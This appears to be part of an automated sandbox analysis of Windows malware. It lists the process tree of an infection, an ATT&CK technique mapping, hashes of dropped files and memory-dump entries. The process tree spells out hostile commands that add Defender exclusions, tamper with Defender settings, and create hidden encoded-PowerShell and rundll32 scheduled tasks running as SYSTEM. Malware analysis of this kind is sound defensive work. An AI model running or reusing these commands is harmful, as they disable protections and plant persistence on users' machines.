"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:3064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1524

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1516

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:560

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:3044

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
PID:800

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2712

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2304

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1660

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2844

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1556

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gcYQlgxIG" /SC once /ST 00:20:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1292

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gcYQlgxIG"
3⤵
PID:2056

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gcYQlgxIG"
3⤵
PID:2152

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
3⤵
PID:2568

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
4⤵
PID:1260

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
3⤵
PID:2192

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
4⤵
PID:524

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qXnxKrbPbFSTFetyh" /SC once /ST 00:55:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\puRisVq.exe\" ob /jYsite_idltk 525403 /S" /V1 /F
3⤵
- Creates scheduled task(s)
PID:1272

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "qXnxKrbPbFSTFetyh"
3⤵
PID:1276

C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\puRisVq.exe
C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\puRisVq.exe ob /jYsite_idltk 525403 /S
2⤵
PID:704

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bwrroZoeZRoQVpyAcj"
3⤵
PID:268

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
3⤵
PID:548

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
4⤵
PID:2416

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
5⤵
PID:1628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
6⤵
PID:580

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
7⤵
PID:2464

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
4⤵
PID:2864

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
5⤵
PID:2828

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
6⤵
PID:2684

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
7⤵
PID:2700

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OJLDvKxDU\QBJvIA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ZPVskaMeORyUtyn" /V1 /F
3⤵
- Creates scheduled task(s)
PID:1596

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZPVskaMeORyUtyn2" /F /xml "C:\Program Files (x86)\OJLDvKxDU\xJhMIrk.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:2368

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ZPVskaMeORyUtyn"
3⤵
PID:2568

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZPVskaMeORyUtyn"
3⤵
PID:2572

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "yrjCurKJXOthHv" /F /xml "C:\Program Files (x86)\jDcnSjPvYahU2\GDxYUIC.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:1956

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "NetXkRqHZJDfE2" /F /xml "C:\ProgramData\mMAjWdbxOIjSziVB\ErkCbrB.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:2012

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "YkvMZvjGAPbigdKuX2" /F /xml "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\rWJgUfA.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:1124

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "nQHiQOLyvgcbJIDARWU2" /F /xml "C:\Program Files (x86)\qpZxqHvFKXpRC\qutYnBi.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:2392

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "EJKQCvUwFyvoZzoaf" /SC once /ST 00:48:40 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\heXdjphsLYtTYYrU\dkcBNkwp\zxbHNDS.dll\",#1 /Xtsite_idUyp 525403" /V1 /F
3⤵
- Creates scheduled task(s)
PID:1612

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "EJKQCvUwFyvoZzoaf"
3⤵
PID:1548

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qXnxKrbPbFSTFetyh"
3⤵
PID:1168

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\heXdjphsLYtTYYrU\dkcBNkwp\zxbHNDS.dll",#1 /Xtsite_idUyp 525403
2⤵
PID:1740

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\heXdjphsLYtTYYrU\dkcBNkwp\zxbHNDS.dll",#1 /Xtsite_idUyp 525403
3⤵
PID:2484

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "EJKQCvUwFyvoZzoaf"
4⤵
PID:1792

C:\Windows\system32\taskeng.exe
taskeng.exe {4B393AC6-C307-4C8F-B3D2-EEA03F5CECA0} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2552

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
PID:692

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1768

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2864

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1432

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1105941297-1273630999-936940394-179152146016114557651525753689-186250564-1119005646"
1⤵
PID:1160

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-594187778-1546695959-1427071501911089147-1404119774483871143-915538478-1728845136"
1⤵
PID:2100

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1344

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-103253266-1492328081-1007149720-1907292161-20396658032112273501492498812-1690658189"
1⤵
PID:596

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\OJLDvKxDU\xJhMIrk.xml
Filesize
2KB

MD5
9aa13f85f4a5005d74c7e3eecc72729f

SHA1
0f3ca323fc6e621064f99fa6dddefb84d74d9311

SHA256
2bb21e6eea34f5932233a64f753d1972b85d26a4a0d31e48d187f08f64dc8dd3

SHA512
39051599bbcd290e69f541813980f5dd806707d3cc09fec033c765acdf50380870f3420af4836cbfdfd203a8f7b8d6ae3b62f04b9828fa985649d23ec5809932

Download Submit
C:\Program Files (x86)\jDcnSjPvYahU2\GDxYUIC.xml
Filesize
2KB

MD5
f53b416ca27f8d81d1599ab61a70c78e

SHA1
e3a46ac2b978e38142073e636d2bbc7e27aeef67

SHA256
5e73d3e1bb9deb2cb252988cf7cb09cf39c2d493a1f8a5fbd59762a68d240750

SHA512
853238045405d5576db49d6f7eef7732fefd73f24215312be05447c4067e20527264bca963455e240368dda57fe3b953ed95221797198e4ce41372564a9c80d4

Download Submit
C:\Program Files (x86)\qpZxqHvFKXpRC\qutYnBi.xml
Filesize
2KB

MD5
a656d2171830695abe3cf7c159d64620

SHA1
2655fdf94adebb6a5a53840984bf7f687ff46848

SHA256
42d5d99cbe93fc62f0ac4cbb30c008a80dec02c20e287375d6bf0958d40f687f

SHA512
0fbbdd5848435d0c6ea7d4ec35d24972495a19d286129f58282357d9a9ee2b46fb4c405ed1cd56f6f0ad34f779306f8639561544cf3cd64a0b27237d623143dd

Download Submit
C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\rWJgUfA.xml
Filesize
2KB

MD5
b0249fa5a1d46d5f03bf4400bcbd3855

SHA1
0743ba7be4bfc68b56d44facad42cde144c63fda

SHA256
42c86fdd3c51be880d0a469967d37f2f67183509d897d580d9f99c8f6d12739d

SHA512
3f82dfa2ff1d8d62575cbe9daca8f8341733d51d55b1de6433d9e5bebc2c5b40c3ca8cca91d43c723f592a3a2b142b99635ece766d3e99a7b3554e94b6f6d5a7

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi
Filesize
2.0MB

MD5
5430e0643b1f6953a745029ca6db59fd

SHA1
c8dc5ef1fdbbf45cae0473820d6d74a10a848dfd

SHA256
6b2e092f4ddd3ec1ff34776e605b03c0b9234e0856b56708e9f77c8cce585ee7

SHA512
18d415df10e817708e620f922c09ffaacdd2f7a6ff1f69c377b051ce7b502672b17026d3496a135b648ca2c2bce0d33f5c5fa129d909177136688e4d75269f78

Download Submit
C:\ProgramData\mMAjWdbxOIjSziVB\ErkCbrB.xml
Filesize
2KB

MD5
d8691756e881a4ce50bd34d27bb25a95

SHA1
f6197fb1fe731a2ff200ee47a9615bb30111b590

SHA256
096fb7e5e2912252a221b7dda1bd36c9900b536e9ac8d9da22084d198f0c7ff6

SHA512
b7caf5b6717f44e1ca9d3d791977bd46c598d589604203d2dea4d1bf3c09babcf841a73479baf9859d4ffb6c3efd1af69b4a3557d01b77096148dc094785a9e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
9KB

MD5
352ef5cc0d2af0f78c7e0412962f6052

SHA1
428207504688e967c91dfa7e5a6fdf04dff08c6c

SHA256
4e27b572d364584bc576b01e8e93f84c3423cd61dc4e9c42459f2867d79497ad

SHA512
9a6cf1ba448ee62ffed662c64405690107d960d0fd5cd61dea77a4626072e061544c588436b3ac4fe99ae2965984af0ddacbab53f83ed37877f3bd5f0f19fced

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
27KB

MD5
a392c9b30610188bcebf35dfce576b05

SHA1
35535bb8212a026520ee044fd91ec4d4dfa934ad

SHA256
2e730d0cbf352ac7a916e0acde1b3eeaa7a8a8eb44b4eec7f4e8b399f8ae984f

SHA512
165ceff614bbb3cfd69e0dd644ce194e6325343940e33e5e0dc59a6e11b9bf830ca03c51e342bda473be30e266ad297e82e576bdab446cb392e7b38706b2d5bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS4FF4.tmp\Install.exe
Filesize
5.4MB

MD5
176184e85c9ab85cca63e3985124430b

SHA1
c8b20100a1e28ddc3615865ee6848b12408237be

SHA256
e6382cd863f6407df2ccdf2eee9bd4ded33dac0e4160cb86c4d354b4489e9a5f

SHA512
dba4be54c59290ca5d044cb565a3c0d63c911218d629536dd6ce5b68891b3f147dd6b2b9138270ab41129143325579d9eabb61841f1295a6505e781e62110438

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS4FF4.tmp\Install.exe
Filesize
2.8MB

MD5
dbbbcdfba1e0952978078513bc25cb0f

SHA1
9bed45d8a709a4bc5293fefd587361e2f0e8b920

SHA256
c943024ec2ac345b4d7ebaebd44b8f2b1890b699805bfb94202c30020b7dabe6

SHA512
6c4e80922e9b24ce381f7115ff1693781779a2a77bffd33db911787c4af8b85da6fab3c34f6797a864fc659f3633e08abf99e7ebaafde938fb55eab23a2fdafe

Download Submit
C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\mgAJCNn.exe
Filesize
6.6MB

MD5
f8efb05b940b05fc74801b61b3c0f500

SHA1
8e3eb6d604f3552d48ebcb385fc2681716b172af

SHA256
90c6b16de088ab3f5737bcb599bb9ffd69a28abd149ab986b7fe52ba8bb2f400

SHA512
028ea55f06fbfb079673df19e6e6249e3a2107a3d5485586f8c18724bf0a6a996ea5a7e31721bed9f7bf677bbf789c596994601076c66676c92fbd3a94741fff

Download Submit
C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\mgAJCNn.exe
Filesize
6.1MB

MD5
917b9d310176206a7f1e42821b9974da

SHA1
684c0bd284afb45518629075bfa1ec0afacebabe

SHA256
ed3a62ea1ecc37c7e706e8e088d968f978586476a137ca9f161f62979e1538ae

SHA512
7fdcf2b3397515d506bcd618141c3bbba07202ad2b4d7e2444c020c8d85868b9f67f0105cab7c3fbefa6cc47ae1e3c33ca60b77dce5d0365fcbfb165dad0c397

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
06fe3d21069a2443d39660cd4c4b4bcd

SHA1
166280363ab86da9d409d41085b90a72c6bc9603

SHA256
9e2f501b4d47550084c0dd98665ddc5f48f2d4d0f9bd6d4acf4ef82cd482a7c0

SHA512
f78dabf9745a4413dac3f21978ecd6054e920b67bae8c364a93c8134db59a85bd2820358f91d93a965a96ef3d1cc2f33d681805fafb2e7acef268459f3e082ba

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LE1AYYWRXWOFOILC5SYO.temp
Filesize
7KB

MD5
6e55582dd963be191dd26c3239b2348f

SHA1
ba1f7a4d9494761b77bd2e0c01bae112ff7ec8af

SHA256
c423ac3545c74528aeb2f9027f5317f90920db05400c3fbcb9d9517b72ef1295

SHA512
948daf2ead6f4ecad4b1807fbcca16742d9b581efe38dfb38b1bb24af118e1114eb402f0339e7ef2a178abe8d4a190657ec5d20304a332b3a328364abf619371

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gdoevwuq.default-release\prefs.js
Filesize
6KB

MD5
8356ad73e751acf1678490fd9eb56bee

SHA1
4b92282872db72c4c7b110e40479f8753978770e

SHA256
f4ad67ec2b2ae0ff82b260d2a7dcde2c7f49f02313a4c2496d749a3fb198251f

SHA512
bb9ff99fe0a11fb13043792b470f64781f9f92bbdbe9eb43fad4ef542f5e2b5c342331daf7529608367ed0ea4974ca70991a45cac9ec242573c8d91bb91e4690

Download Submit
C:\Windows\Temp\heXdjphsLYtTYYrU\xyVhveKX\thsCdlZPKbViygcY.wsf
Filesize
9KB

MD5
043a12c50ede5b753abd69965e719b36

SHA1
247275eeeca41ee4caef06036801b8ed5d482460

SHA256
e8b3b806f8494c97c062169b21a2cabdfa894f3c13ee21c020f5b7c78a361ead

SHA512
510b4668929da8992f4fe326d2daccd5d78bedb916698a5d086eb412782570ae835b844126deac90a62cbb4363b84892732667e267a3a3b2fc88a1afabed77fb

Download Submit
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
Filesize
5KB

MD5
95a215a013ec7fda96d90c00c7525ead

SHA1
7da1c1d554ab2bdd491467d5d0da5b958d9c157b

SHA256
674c4c426a307341e9c73fa290b9d53475ce2c1e892d7d490c31e46e3bd09b0a

SHA512
c75e077f916330715203143b63c4a3a08bf3734be14e65dc1a9bbf277d3e39d9e40901662174c8a5b6f8940daa2e7859ef83a37c8ea91d3b258535c4cf52366b

Download Submit
\Users\Admin\AppData\Local\Temp\7zS4FF4.tmp\Install.exe
Filesize
1.2MB

MD5
68d609bacdc309d50ef061cee4f9416c

SHA1
bf7a95c32c55b9c99a08eaa9a479203177647dbf

SHA256
3f360da5af6e6a4a46d0eabb5de59c8b605cb9642f797b2b46ad96b875150160

SHA512
a1c5dfd5fe9b84e23b29b2c5184900eb998eebbfa4a9e0867501e2a7161a53295d5bc39529284e92743c878363d59049b32104c81ecbf9c0cf82e75902e89c13

Download Submit
\Users\Admin\AppData\Local\Temp\7zS4FF4.tmp\Install.exe
Filesize
1.9MB

MD5
925a54adcbd292fd22b240c553de12e0

SHA1
3b99f42605f60d5c23ccab287ff446e4346c145d

SHA256
3529b3bcb258871b29313546041e24fac8d2735316cb9fbf4570822a80b417b1

SHA512
ee98256f737b9d4ef627b64b0f4e7ffaa1ac90ec64bba10bb2e473951efdf36de52c8b0a4ec3ddbabdf28e9cd3381e74c0dd0e312e535f6a08bee5a2dd32fde7

Download Submit
\Users\Admin\AppData\Local\Temp\7zS4FF4.tmp\Install.exe
Filesize
1.9MB

MD5
57f869d9fb6dd49ae224b13ac0ba89ec

SHA1
8c58e8d131a18e965f6642568dde61420c186957

SHA256
1a25dfea5ccb3d3944f7aaf9b169376ed591b82e1ccf1271073fe462b5bdb0a5

SHA512
2b9d91552ff1e856e9b5658414bca5fac0931b084d96aad2894da32741234775bb5fa66ce91c93dd6aea2709cb5e4e56d6b76c5789e5937575f7573ff963ee27

Download Submit
\Windows\Temp\heXdjphsLYtTYYrU\dkcBNkwp\zxbHNDS.dll
Filesize
2.1MB

MD5
4dd8c1a65d3211ce70375f98b744e644

SHA1
f18e448eebecad46b3994afc19a04723b3977e5f

SHA256
967282634681564fa66360f77c8bf6e2ff3873e5797f41756fece8fbe5d385c1

SHA512
fe2e9282e5a55c7901e07d2da75be8a4224d451de2f203b43a4ff444f1cb3ab30f713ff0dc2d45b70bc0b45eb94712f55a7cf1e65cc9fd59656be5f28a0d3bda

Download Submit
\Windows\Temp\heXdjphsLYtTYYrU\dkcBNkwp\zxbHNDS.dll
Filesize
5.4MB

MD5
d0bb0040eb64d85ce40ba511b1130d4b

SHA1
8fb04d2088c9d482065fc6d84de15c7c252b5b30

SHA256
5ffe3e16c808be8b5eb6c9baefccecff1e5de2af5534071790e6e49cc08eac06

SHA512
b46c5bfe96b233a07119132abc1a8934a0ec8e14547410f37ee92aad5a5e652216b62b72a9ff32d4d0f18ab6a205c4867335dfb1d09716606c7037fbfd6fd519

Download Submit
\Windows\Temp\heXdjphsLYtTYYrU\dkcBNkwp\zxbHNDS.dll
Filesize
1.9MB

MD5
66b0abe08b49ee22745fda0813d8c8a5

SHA1
9e26ccae13022b8621c55bebcaf2c94b32098140

SHA256
d9fe4492b1c07deb7ca589a378da54e09d8d38fc899272e76ce552fad8327586

SHA512
2526d3314cd5bc7e04eeae322618f4ad727399180eee632eb359ee33d1334c2494064001a459535dd69e23dee402d7028983755a5963e00a3120373d82c69ceb

Download Submit
memory/580-105-0x0000000001180000-0x00000000011C0000-memory.dmp

Filesize
256KB

Download
memory/580-93-0x0000000001180000-0x00000000011C0000-memory.dmp

Filesize
256KB

Download
memory/580-92-0x00000000746D0000-0x0000000074C7B000-memory.dmp

Filesize
5.7MB

Download
memory/580-100-0x00000000746D0000-0x0000000074C7B000-memory.dmp

Filesize
5.7MB

Download
memory/580-103-0x00000000746D0000-0x0000000074C7B000-memory.dmp

Filesize
5.7MB

Download
memory/580-109-0x00000000746D0000-0x0000000074C7B000-memory.dmp

Filesize
5.7MB

Download
memory/692-78-0x000007FEF5A10000-0x000007FEF63AD000-memory.dmp

Filesize
9.6MB

Download
memory/692-77-0x000007FEF5A10000-0x000007FEF63AD000-memory.dmp

Filesize
9.6MB

Download
memory/692-81-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/692-82-0x000007FEF5A10000-0x000007FEF63AD000-memory.dmp

Filesize
9.6MB

Download
memory/692-80-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/692-79-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/704-142-0x0000000007DE0000-0x0000000007E42000-memory.dmp

Filesize
392KB

Download
memory/704-101-0x0000000007B10000-0x0000000007B95000-memory.dmp

Filesize
532KB

Download
memory/704-339-0x0000000008A50000-0x0000000008B1B000-memory.dmp

Filesize
812KB

Download
memory/704-325-0x0000000008710000-0x0000000008794000-memory.dmp

Filesize
528KB

